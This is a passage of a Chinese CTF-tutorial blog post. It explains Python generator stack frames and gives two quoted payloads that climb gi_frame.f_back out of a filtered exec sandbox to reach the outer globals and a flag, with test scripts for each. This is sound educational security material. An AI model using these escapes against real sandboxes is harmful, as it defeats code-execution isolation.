<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
/style><<!doctype html>

<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="light">
  <head>
